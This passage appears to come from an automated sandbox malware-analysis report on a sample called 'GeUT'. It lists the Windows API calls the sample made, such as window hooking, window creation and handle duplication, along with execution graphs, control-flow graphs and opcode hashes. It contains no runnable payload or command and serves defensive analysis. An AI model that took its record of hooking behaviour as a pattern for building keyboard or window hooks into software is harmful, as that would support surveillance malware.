                      • Opcode Fuzzy Hash: f48ff16c43f81c8154e1fb3c263db4ac8d8ddab2415d4e18da98f0a58a0559ff
                      • Instruction Fuzzy Hash: 4C2199B8D002089FCB10CFA9D484ADEFBF4BB09320F20901AE914B3310D375A945CFA4
                      Memory Dump Source
                      • Source File: 00000002.00000002.2147161094.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_bfd000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 22e39c9bdb26fc2be5d323f04c424486d2791762b7d6f469ed4dd8889db8811d
                      • Instruction ID: 3ccf299aa118b5a49947d940b90c0cf74c0adf256ed3545a923796d83ccb34e2
                      • Opcode Fuzzy Hash: 22e39c9bdb26fc2be5d323f04c424486d2791762b7d6f469ed4dd8889db8811d
                      • Instruction Fuzzy Hash: 15212872504208EFDB05DF14D9C0B36BFA6FB94314F2085ADEA094B256C736D85ACAA1
                      Memory Dump Source
                      • Source File: 00000002.00000002.2147161094.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_bfd000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                      • Instruction ID: b08d8fb98bd23ae02174447df723800166ca4d1cc191345b1fa4a931497e69b2
                      • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                      • Instruction Fuzzy Hash: 5111D376504284DFCF15CF10D5C4B26BFB2FB94314F24C6A9D9094B256C33AD85ACBA2

                      Execution Graph

                      Execution Coverage:14.1%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:147
                      Total number of Limit Nodes:6
                      execution_graph 26028 a9d0fc 26029 a9d114 26028->26029 26030 a9d16e 26029->26030 26036 4ea9bd8 26029->26036 26042 4ea9be8 26029->26042 26048 4ea9454 26029->26048 26056 4ea9444 26029->26056 26060 4eaa93e 26029->26060 26037 4ea9c0e 26036->26037 26038 4ea9444 SetWindowLongW 26037->26038 26039 4ea9c1a 26038->26039 26040 4ea9454 CallWindowProcW 26039->26040 26041 4ea9c2f 26040->26041 26041->26030 26043 4ea9c0e 26042->26043 26044 4ea9444 SetWindowLongW 26043->26044 26045 4ea9c1a 26044->26045 26046 4ea9454 CallWindowProcW 26045->26046 26047 4ea9c2f 26046->26047 26047->26030 26049 4ea945f 26048->26049 26050 4eaa9a9 26049->26050 26052 4eaa999 26049->26052 26079 4ea957c 26050->26079 26069 4eaaac2 26052->26069 26074 4eaaad0 26052->26074 26053 4eaa9a7 26057 4ea944f 26056->26057 26093 4ea947c 26057->26093 26059 4ea9d27 26059->26030 26061 4eaa8d1 26060->26061 26063 4eaa942 26060->26063 26061->26030 26062 4eaa9a9 26064 4ea957c CallWindowProcW 26062->26064 26063->26062 26065 4eaa999 26063->26065 26066 4eaa9a7 26064->26066 26067 4eaaac2 CallWindowProcW 26065->26067 26068 4eaaad0 CallWindowProcW 26065->26068 26067->26066 26068->26066 26070 4eaaad0 26069->26070 26083 4eaab88 26070->26083 26086 4eaab78 26070->26086 26071 4eaab70 26071->26053 26075 4eaaae4 26074->26075 26077 4eaab88 CallWindowProcW 26075->26077 26078 4eaab78 CallWindowProcW 26075->26078 26076 4eaab70 26076->26053 26077->26076 26078->26076 26080 4ea9587 26079->26080 26081 4eac08a CallWindowProcW 26080->26081 26082 4eac039 26080->26082 26081->26082 26082->26053 26084 4eaab99 26083->26084 26089 4eabfc2 26083->26089 26084->26071 26087 4eaab99 26086->26087 26088 4eabfc2 CallWindowProcW 26086->26088 26087->26071 26088->26087 26090 4eabfd0 26089->26090 26091 4ea957c CallWindowProcW 26090->26091 26092 4eabfda 26091->26092 26092->26084 26095 4ea9487 26093->26095 26094 4ea9fb6 26095->26094 26097 4ea9c48 26095->26097 26100 4ea9464 26097->26100 26101 4ea9c78 SetWindowLongW 26100->26101 26102 4ea9c60 26101->26102 26102->26094 25961 aeabe8 25962 aeac16 25961->25962 25965 aea598 25962->25965 25964 aeac36 25966 aea5a3 25965->25966 25967 aec324 25966->25967 25970 4ea0a00 25966->25970 25975 4ea09f1 25966->25975 25967->25964 25971 4ea0a21 25970->25971 25972 4ea0a45 25971->25972 25980 4ea0c20 25971->25980 25985 4ea0c10 25971->25985 25972->25967 25976 4ea0a21 25975->25976 25977 4ea0a45 25976->25977 25978 4ea0c20 2 API calls 25976->25978 25979 4ea0c10 2 API calls 25976->25979 25977->25967 25978->25977 25979->25977 25982 4ea0c2d 25980->25982 25981 4ea0c66 25981->25972 25982->25981 25990 4ea0df9 25982->25990 25995 4ea0e08 25982->25995 25986 4ea0c2d 25985->25986 25987 4ea0c66 25986->25987 25988 4ea0e08 2 API calls 25986->25988 25989 4ea0df9 2 API calls 25986->25989 25987->25972 25988->25987 25989->25987 25991 4ea0e06 25990->25991 25992 4ea0e58 25991->25992 26000 4ea0eb8 25991->26000 26005 4ea0ea0 25991->26005 25992->25992 25996 4ea0e30 25995->25996 25997 4ea0e58 25996->25997 25998 4ea0eb8 2 API calls 25996->25998 25999 4ea0ea0 2 API calls 25996->25999 25997->25997 25998->25997 25999->25997 26001 4ea0ec7 26000->26001 26004 4ea0ed6 26001->26004 26010 4ea2128 26001->26010 26014 4ea2118 26001->26014 26004->25992 26006 4ea0eb8 26005->26006 26007 4ea2128 KiUserCallbackDispatcher 26006->26007 26008 4ea2118 KiUserCallbackDispatcher 26006->26008 26009 4ea0ed6 26006->26009 26007->26009 26008->26009 26009->25992 26012 4ea2156 26010->26012 26011 4ea2212 KiUserCallbackDispatcher 26013 4ea2227 26011->26013 26012->26011 26012->26013 26016 4ea2156 26014->26016 26015 4ea2212 KiUserCallbackDispatcher 26017 4ea2227 26015->26017 26016->26015 26016->26017 26132 ae9348 DuplicateHandle 26133 ae93de 26132->26133 26103 4ea9a30 26104 4ea9a98 CreateWindowExW 26103->26104 26106 4ea9b54 26104->26106 26134 4ea0040 26135 4ea0088 GetModuleHandleW 26134->26135 26136 4ea0082 26134->26136 26137 4ea00b5 26135->26137 26136->26135 26018 ae90e0 26019 ae9126 GetCurrentProcess 26018->26019 26021 ae9178 GetCurrentThread 26019->26021 26022 ae9171 26019->26022 26023 ae91b5 GetCurrentProcess 26021->26023 26024 ae91ae 26021->26024 26022->26021 26027 ae91eb 26023->26027 26024->26023 26025 ae9213 GetCurrentThreadId 26026 ae9244 26025->26026 26027->26025 26107 ae80b0 26108 ae80be 26107->26108 26111 ae7c90 26108->26111 26110 ae80c7 26112 ae7c95 26111->26112 26114 ae81cd 26112->26114 26115 ae7cec 26112->26115 26114->26110 26116 ae7cf7 26115->26116 26119 ae7dd8 26116->26119 26118 ae828d 26118->26114 26120 ae7de3 26119->26120 26123 ae8ad8 26120->26123 26122 ae8f72 26122->26118 26124 ae8ae3 26123->26124 26127 ae8d84 26124->26127 26126 ae907c 26126->26122 26129 ae8d8f 26127->26129 26128 aec859 26128->26126 26129->26128 26130 4ea0a00 2 API calls 26129->26130 26131 4ea09f1 2 API calls 26129->26131 26130->26128 26131->26128 26138 ae3ed0 26139 ae3f14 SetWindowsHookExW 26138->26139 26141 ae3f5a 26139->26141

                      Control-flow Graph

                      APIs
                      • GetCurrentProcess.KERNEL32 ref: 00AE915E
                      • GetCurrentThread.KERNEL32 ref: 00AE919B
                      • GetCurrentProcess.KERNEL32 ref: 00AE91D8
                      • GetCurrentThreadId.KERNEL32 ref: 00AE9231
                      Memory Dump Source
                      • Source File: 00000003.00000002.3409417996.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_ae0000_GeUT.jbxd
                      Similarity
                      • API ID: Current$ProcessThread
                      • String ID:
                      • API String ID: 2063062207-0
                      • Opcode ID: 233cb8914f1de712e8148f400d47030e6447fad04a8c7dff319183aae319ceee
                      • Instruction ID: 6e9c3dab7d982bb60b0ce7a24640f19653067033685da76e7643119307abb850
                      • Opcode Fuzzy Hash: 233cb8914f1de712e8148f400d47030e6447fad04a8c7dff319183aae319ceee
                      • Instruction Fuzzy Hash: D65175B090034A8FDB55CFAAD948BDEBBF1BF88314F248459E409A7360DB749944CF65

                      Control-flow Graph

                      APIs
                      • GetCurrentProcess.KERNEL32 ref: 00AE915E
                      • GetCurrentThread.KERNEL32 ref: 00AE919B
                      • GetCurrentProcess.KERNEL32 ref: 00AE91D8
                      • GetCurrentThreadId.KERNEL32 ref: 00AE9231
                      Memory Dump Source
                      • Source File: 00000003.00000002.3409417996.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_ae0000_GeUT.jbxd
                      Similarity
                      • API ID: Current$ProcessThread
                      • String ID:
                      • API String ID: 2063062207-0
                      • Opcode ID: cd9076de4faf4e7098067ba46b6aa43eb08799580d7e8fa517b584a18172dc98
                      • Instruction ID: c4adbcb3b2d47e15e4fdd1587204598dac816f60930f1ceb6bd3632c783fdf2b
                      • Opcode Fuzzy Hash: cd9076de4faf4e7098067ba46b6aa43eb08799580d7e8fa517b584a18172dc98
                      • Instruction Fuzzy Hash: 865154B490034A8FDB54CFAAD948BDEBBF1BF88314F248459E409A7360DB74A944CB65

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 489 4ea2128-4ea216a 492 4ea248b-4ea2498 489->492 493 4ea2170-4ea2172 489->493 496 4ea249a-4ea249c 492->496 497 4ea2500-4ea2524 492->497 494 4ea217f-4ea2191 493->494 495 4ea2174 493->495 499 4ea2227-4ea223a 494->499 500 4ea2197-4ea21b2 494->500 495->494 496->497 498 4ea249e-4ea24b1 496->498 512 4ea252a-4ea2568 497->512 513 4ea25d9-4ea25ec 497->513 498->497 507 4ea24b3-4ea24e6 call 4ea130c 498->507 505 4ea226c-4ea2286 499->505 506 4ea223c-4ea223e 499->506 508 4ea21b8-4ea21e6 500->508 509 4ea234e-4ea235e 500->509 525 4ea2288 505->525 526 4ea2293-4ea22db 505->526 506->509 511 4ea2244-4ea224e 506->511 507->497 536 4ea24e8-4ea24fb 507->536 527 4ea21e8-4ea21f5 508->527 528 4ea21f7-4ea2210 508->528 523 4ea2378-4ea237c 509->523 524 4ea2360-4ea2371 509->524 511->509 514 4ea2254-4ea2266 call 4ea12a0 511->514 542 4ea256a-4ea2590 512->542 543 4ea2592-4ea25b3 512->543 519 4ea25ee-4ea25f4 513->519 514->505 514->509 541 4ea25f5 519->541 532 4ea245f-4ea247d call 4ea12dc 523->532 533 4ea2382-4ea23c7 523->533 524->523 525->526 548 4ea22dd-4ea22f2 526->548 549 4ea22f4-4ea2304 526->549 531 4ea2212-4ea2222 KiUserCallbackDispatcher 527->531 528->531 531->509 532->519 559 4ea2409-4ea242c 533->559 560 4ea23c9-4ea2404 call 4ea12bc call 4ea12cc 533->560 536->519 541->541 553 4ea25b8-4ea25d4 call 4ea12b0 542->553 543->553 552 4ea2309-4ea232a call 4ea12b0 548->552 549->552 552->509 553->513 573 4ea242f call 4ea3758 559->573 574 4ea242f call 4ea3720 559->574 560->559 564 4ea2432-4ea244e 567 4ea245c 564->567 568 4ea2450 564->568 567->532 568->567 573->564 574->564
                      APIs
                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 04EA221D
                      Memory Dump Source
                      • Source File: 00000003.00000002.3415429163.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_4ea0000_GeUT.jbxd
                      Similarity
                      • API ID: CallbackDispatcherUser
                      • String ID:
                      • API String ID: 2492992576-0
                      • Opcode ID: 26749e1d108c4827da806c21fdbce7f08d6e2c4a6e236b030b78e21069612b50
                      • Instruction ID: ad1bb6ad6d19919f25fab7e8146a88e56a586aa5bd8c1c6841513dada0d56663
                      • Opcode Fuzzy Hash: 26749e1d108c4827da806c21fdbce7f08d6e2c4a6e236b030b78e21069612b50
                      • Instruction Fuzzy Hash: 61E11971A002198FDB14DF64C844B9DB7B2BF85308F1184A9E909BF361DB71B99ACF50

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 575 4ea2118-4ea216a 578 4ea248b-4ea2498 575->578 579 4ea2170-4ea2172 575->579 582 4ea249a-4ea249c 578->582 583 4ea2500-4ea2524 578->583 580 4ea217f-4ea2191 579->580 581 4ea2174 579->581 585 4ea2227-4ea223a 580->585 586 4ea2197-4ea21b2 580->586 581->580 582->583 584 4ea249e-4ea24b1 582->584 598 4ea252a-4ea2568 583->598 599 4ea25d9-4ea25ec 583->599 584->583 593 4ea24b3-4ea24e6 call 4ea130c 584->593 591 4ea226c-4ea2286 585->591 592 4ea223c-4ea223e 585->592 594 4ea21b8-4ea21e6 586->594 595 4ea234e-4ea235e 586->595 611 4ea2288 591->611 612 4ea2293-4ea22db 591->612 592->595 597 4ea2244-4ea224e 592->597 593->583 622 4ea24e8-4ea24fb 593->622 613 4ea21e8-4ea21f5 594->613 614 4ea21f7-4ea2210 594->614 609 4ea2378-4ea237c 595->609 610 4ea2360-4ea2371 595->610 597->595 600 4ea2254-4ea2266 call 4ea12a0 597->600 628 4ea256a-4ea2590 598->628 629 4ea2592-4ea25b3 598->629 605 4ea25ee-4ea25f4 599->605 600->591 600->595 627 4ea25f5 605->627 618 4ea245f-4ea247d call 4ea12dc 609->618 619 4ea2382-4ea23c7 609->619 610->609 611->612 634 4ea22dd-4ea22f2 612->634 635 4ea22f4-4ea2304 612->635 617 4ea2212-4ea2222 KiUserCallbackDispatcher 613->617 614->617 617->595 618->605 645 4ea2409-4ea242c 619->645 646 4ea23c9-4ea2404 call 4ea12bc call 4ea12cc 619->646 622->605 627->627 639 4ea25b8-4ea25d4 call 4ea12b0 628->639 629->639 638 4ea2309-4ea232a call 4ea12b0 634->638 635->638 638->595 639->599 659 4ea242f call 4ea3758 645->659 660 4ea242f call 4ea3720 645->660 646->645 650 4ea2432-4ea244e 653 4ea245c 650->653 654 4ea2450 650->654 653->618 654->653 659->650 660->650
                      APIs
                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 04EA221D
                      Memory Dump Source
                      • Source File: 00000003.00000002.3415429163.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_4ea0000_GeUT.jbxd
                      Similarity
                      • API ID: CallbackDispatcherUser
                      • String ID:
                      • API String ID: 2492992576-0
                      • Opcode ID: 7701e9304d69cf089dcacbfad36b8888de9011c10ca4f3236408bb86b783b358
                      • Instruction ID: 4ebe750f280d1dce76a2f2d595235086978fced67415b88ba5eda5b9c30332ef
                      • Opcode Fuzzy Hash: 7701e9304d69cf089dcacbfad36b8888de9011c10ca4f3236408bb86b783b358
                      • Instruction Fuzzy Hash: DD513D74A00215CFDB24DF64C884B99B7B2FF84308F1044A9E619AB362DB71BD96CF50

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 661 4ea9a24-4ea9a96 662 4ea9a98-4ea9a9e 661->662 663 4ea9aa1-4ea9aa8 661->663 662->663 664 4ea9aaa-4ea9ab0 663->664 665 4ea9ab3-4ea9aeb 663->665 664->665 666 4ea9af3-4ea9b52 CreateWindowExW 665->666 667 4ea9b5b-4ea9b93 666->667 668 4ea9b54-4ea9b5a 666->668 672 4ea9ba0 667->672 673 4ea9b95-4ea9b98 667->673 668->667 674 4ea9ba1 672->674 673->672 674->674
                      APIs
                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04EA9B42
                      Memory Dump Source
                      • Source File: 00000003.00000002.3415429163.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_4ea0000_GeUT.jbxd
                      Similarity
                      • API ID: CreateWindow
                      • String ID:
                      • API String ID: 716092398-0
                      • Opcode ID: 4ecfacaaefac2d4f09998647189f9b2b4a91c5ee6fedb316eb727015f852e57e
                      • Instruction ID: 4ea81f8fa63e587d3c5c325ad537ee4eda74ec92eff27dbecb67b5004077fb93
                      • Opcode Fuzzy Hash: 4ecfacaaefac2d4f09998647189f9b2b4a91c5ee6fedb316eb727015f852e57e
                      • Instruction Fuzzy Hash: 1051E2B1D00349DFDB14CFA9C884ADEBFB5BF88314F64852AE819AB211D771A855CF90

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 675 4ea9a30-4ea9a96 676 4ea9a98-4ea9a9e 675->676 677 4ea9aa1-4ea9aa8 675->677 676->677 678 4ea9aaa-4ea9ab0 677->678 679 4ea9ab3-4ea9b52 CreateWindowExW 677->679 678->679 681 4ea9b5b-4ea9b93 679->681 682 4ea9b54-4ea9b5a 679->682 686 4ea9ba0 681->686 687 4ea9b95-4ea9b98 681->687 682->681 688 4ea9ba1 686->688 687->686 688->688
                      APIs
                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04EA9B42
                      Memory Dump Source
                      • Source File: 00000003.00000002.3415429163.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_4ea0000_GeUT.jbxd
                      Similarity
                      • API ID: CreateWindow
                      • String ID:
                      • API String ID: 716092398-0
                      • Opcode ID: 18df2ed2bd904797dd2f2082aea21326c066f6c0d459c46a7a43929dd11a288c
                      • Instruction ID: cd2aad70112bd5a98aa18d885ef466f221fdf571520ca7c89813345deead00eb
                      • Opcode Fuzzy Hash: 18df2ed2bd904797dd2f2082aea21326c066f6c0d459c46a7a43929dd11a288c
                      • Instruction Fuzzy Hash: 0541E0B1D00309DFDF14CF9AC884ADEBBB5BF88310F24852AE819AB210D775A855CF90

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 689 4ea957c-4eac02c 692 4eac0dc-4eac0fc call 4ea9454 689->692 693 4eac032-4eac037 689->693 700 4eac0ff-4eac10c 692->700 695 4eac08a-4eac0c2 CallWindowProcW 693->695 696 4eac039-4eac070 693->696 697 4eac0cb-4eac0da 695->697 698 4eac0c4-4eac0ca 695->698 703 4eac079-4eac088 696->703 704 4eac072-4eac078 696->704 697->700 698->697 703->700 704->703
                      APIs
                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 04EAC0B1
                      Memory Dump Source
                      • Source File: 00000003.00000002.3415429163.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_4ea0000_GeUT.jbxd
                      Similarity
                      • API ID: CallProcWindow
                      • String ID:
                      • API String ID: 2714655100-0
                      • Opcode ID: 80eca796b3f9163e9565cba0e8cf96c17bf92885ab4ef145242f501595ddbea4
                      • Instruction ID: 2bf2e81ebf6bf433d44d69b19bd0962b3817bab203ce03fba687b16762c6dda0
                      • Opcode Fuzzy Hash: 80eca796b3f9163e9565cba0e8cf96c17bf92885ab4ef145242f501595ddbea4
                      • Instruction Fuzzy Hash: 2B4104B9A00209DFDB14CF99C488AAABBF5FF88314F248459D519AB321D775B851CFA0

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 706 ae9340-ae93dc DuplicateHandle 707 ae93de-ae93e4 706->707 708 ae93e5-ae9402 706->708 707->708
                      APIs
                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00AE93CF
                      Memory Dump Source
                      • Source File: 00000003.00000002.3409417996.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_ae0000_GeUT.jbxd
                      Similarity
                      • API ID: DuplicateHandle
                      • String ID:
                      • API String ID: 3793708945-0
                      • Opcode ID: 0afa656539b1b4e885aacb33fcd7256edb955e007a6305e1fef674d312e9529e
                      • Instruction ID: 3c812b95bbbc4f257d1a93f7a02fc1b47d508973a06c767546899d7567083899
                      • Opcode Fuzzy Hash: 0afa656539b1b4e885aacb33fcd7256edb955e007a6305e1fef674d312e9529e
                      • Instruction Fuzzy Hash: 1A2103B58002499FDB10CFAAD984AEEBFF4FF48320F14811AE918A7351C375A950CF60

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 721 ae9348-ae93dc DuplicateHandle 722 ae93de-ae93e4 721->722 723 ae93e5-ae9402 721->723 722->723
                      APIs
                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00AE93CF
                      Memory Dump Source
                      • Source File: 00000003.00000002.3409417996.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_ae0000_GeUT.jbxd
                      Similarity
                      • API ID: DuplicateHandle
                      • String ID:
                      • API String ID: 3793708945-0
                      • Opcode ID: c82ca5f173b5f00539ee4a3bd910e52dd421ee66dbafe0b89e1afc6b27e0b524
                      • Instruction ID: f8d7a7d0029cbb1fd1a1bc5303891865017f06a7565551ba78cde5a8d295faa9
                      • Opcode Fuzzy Hash: c82ca5f173b5f00539ee4a3bd910e52dd421ee66dbafe0b89e1afc6b27e0b524
                      • Instruction Fuzzy Hash: 7921C4B59003499FDB10CFAAD984ADEBBF4FB48320F14841AE918A7350D375A954CFA5

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 711 ae3ec8-ae3f1a 713 ae3f1c 711->713 714 ae3f26-ae3f58 SetWindowsHookExW 711->714 717 ae3f24 713->717 715 ae3f5a-ae3f60 714->715 716 ae3f61-ae3f86 714->716 715->716 717->714
                      APIs
                      • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 00AE3F4B
                      Memory Dump Source
                      • Source File: 00000003.00000002.3409417996.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_ae0000_GeUT.jbxd
                      Similarity
                      • API ID: HookWindows
                      • String ID:
                      • API String ID: 2559412058-0
                      • Opcode ID: 292e78eb33475183478373394b474326d0cee2c6847c3e3f8443fb8647b52ed7
                      • Instruction ID: 9ccaf6003751c6d54c0cbd5ea475dc50b1adcdd89a0aaecb817e3509edab8c77
                      • Opcode Fuzzy Hash: 292e78eb33475183478373394b474326d0cee2c6847c3e3f8443fb8647b52ed7
                      • Instruction Fuzzy Hash: 4C211872D04249DFDB14CFAAD844BEEBBF5AF88310F14841AE419A7250C7B5A945CFA1

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 726 4ea001f-4ea0080 727 4ea0088-4ea00b3 GetModuleHandleW 726->727 728 4ea0082-4ea0085 726->728 729 4ea00bc-4ea00d0 727->729 730 4ea00b5-4ea00bb 727->730 728->727 730->729
                      APIs
                      • GetModuleHandleW.KERNELBASE(00000000), ref: 04EA00A6
                      Memory Dump Source
                      • Source File: 00000003.00000002.3415429163.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_4ea0000_GeUT.jbxd
                      Similarity
                      • API ID: HandleModule
                      • String ID:
                      • API String ID: 4139908857-0
                      • Opcode ID: 9755654b5c35f43a83aae627ad427ef4fe2cec49343d812fa734c243819f577e
                      • Instruction ID: 3b18f71d9465d5129a831b3eea9de9f91c392075e8aa54866dc512ffa9acc819
                      • Opcode Fuzzy Hash: 9755654b5c35f43a83aae627ad427ef4fe2cec49343d812fa734c243819f577e
                      • Instruction Fuzzy Hash: 612147B6C003498FDB10CF9AC4847DEBBF0EF89324F10845AC459AB211D375A506CFA1

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 732 ae3ed0-ae3f1a 734 ae3f1c 732->734 735 ae3f26-ae3f58 SetWindowsHookExW 732->735 738 ae3f24 734->738 736 ae3f5a-ae3f60 735->736 737 ae3f61-ae3f86 735->737 736->737 738->735
                      APIs
                      • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 00AE3F4B
                      Memory Dump Source
                      • Source File: 00000003.00000002.3409417996.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_ae0000_GeUT.jbxd
                      Similarity
                      • API ID: HookWindows
                      • String ID:
                      • API String ID: 2559412058-0
                      • Opcode ID: 27c5b393b7f00331ef9f4b648ef0803424d49e3b31c6ff2de4de63595cf0a5c8
                      • Instruction ID: 3f2e928758252c95b053be3171bb4fdff56a8d834636a16870d468e5b2500384
                      • Opcode Fuzzy Hash: 27c5b393b7f00331ef9f4b648ef0803424d49e3b31c6ff2de4de63595cf0a5c8
                      • Instruction Fuzzy Hash: 55211571D0024A9FDB14CFAAC844BDEBBF5AF88710F108429E419A7250C7B5A940CFA1
                      APIs
                      • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 04EA9CD5
                      Memory Dump Source
                      • Source File: 00000003.00000002.3415429163.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_4ea0000_GeUT.jbxd
                      Similarity
                      • API ID: LongWindow
                      • String ID:
                      • API String ID: 1378638983-0
                      • Opcode ID: bc035fd4973e6b074a4dda8012b12e56d6f78bc2bffa0d14d737a2f1ab6bdba8
                      • Instruction ID: b331d3f39a5a76d2f1cb4119b4e616a6e1c57f21d577beffcd47d9a6b5da3134
                      • Opcode Fuzzy Hash: bc035fd4973e6b074a4dda8012b12e56d6f78bc2bffa0d14d737a2f1ab6bdba8
                      • Instruction Fuzzy Hash: 941125B58006098FDB10CF9AC585BEEBBF8EB48320F208459D919B7201D3B4A954CFA5

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 742 4ea0040-4ea0080 743 4ea0088-4ea00b3 GetModuleHandleW 742->743 744 4ea0082-4ea0085 742->744 745 4ea00bc-4ea00d0 743->745 746 4ea00b5-4ea00bb 743->746 744->743 746->745
                      APIs
                      • GetModuleHandleW.KERNELBASE(00000000), ref: 04EA00A6
                      Memory Dump Source
                      • Source File: 00000003.00000002.3415429163.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_4ea0000_GeUT.jbxd
                      Similarity
                      • API ID: HandleModule
                      • String ID:
                      • API String ID: 4139908857-0
                      • Opcode ID: b1b7cf1b3eecebc036c41b7fb0509e3c426ff2077edca7d499708b47cceb4a53
                      • Instruction ID: 3d6b81fd029176e26dfd1dacf57ab2fcfef31dbed3ac3c4388643ed7b9595ada
                      • Opcode Fuzzy Hash: b1b7cf1b3eecebc036c41b7fb0509e3c426ff2077edca7d499708b47cceb4a53
                      • Instruction Fuzzy Hash: BA11DFB6C007498FDB10DF9AC444A9EFBF4AB88724F10842AD969A7210D3B9A545CFA5
                      APIs
                      • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 04EA9CD5
                      Memory Dump Source
                      • Source File: 00000003.00000002.3415429163.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_4ea0000_GeUT.jbxd
                      Similarity
                      • API ID: LongWindow
                      • String ID:
                      • API String ID: 1378638983-0
                      • Opcode ID: fd13ece918ddb7b7c9cdb9401679e8df2e230cc9bb4b346e2c076f9b1041809d
                      • Instruction ID: 5a60a123d45ff130562b3186a63e1ca6eb81e473c930defe608ee0d2b35e4b80
                      • Opcode Fuzzy Hash: fd13ece918ddb7b7c9cdb9401679e8df2e230cc9bb4b346e2c076f9b1041809d
                      • Instruction Fuzzy Hash: 831125B58003098FDB10CF9AC545B9FFBF8EB48324F20841AD518A7201C374A940CFA5
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID: ,
                      • API String ID: 0-3772416878
                      • Opcode ID: 266019fb4e690b537483cb155b06ae50b04f13ae512045d047cf89e35133bb0d
                      • Instruction ID: 6a7a1ab86d906e23781ef72813ea32aea29a6dace4dd470374f1788738f78bf0
                      • Opcode Fuzzy Hash: 266019fb4e690b537483cb155b06ae50b04f13ae512045d047cf89e35133bb0d
                      • Instruction Fuzzy Hash: 4141BF30B011048FDB44EFA5D45866EBBF1EF88311F14856AE506AB3A6DB71DC82CB95
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd
                      Similarity
                      • API ID:
                      • String ID: ,
                      • API String ID: 0-3772416878
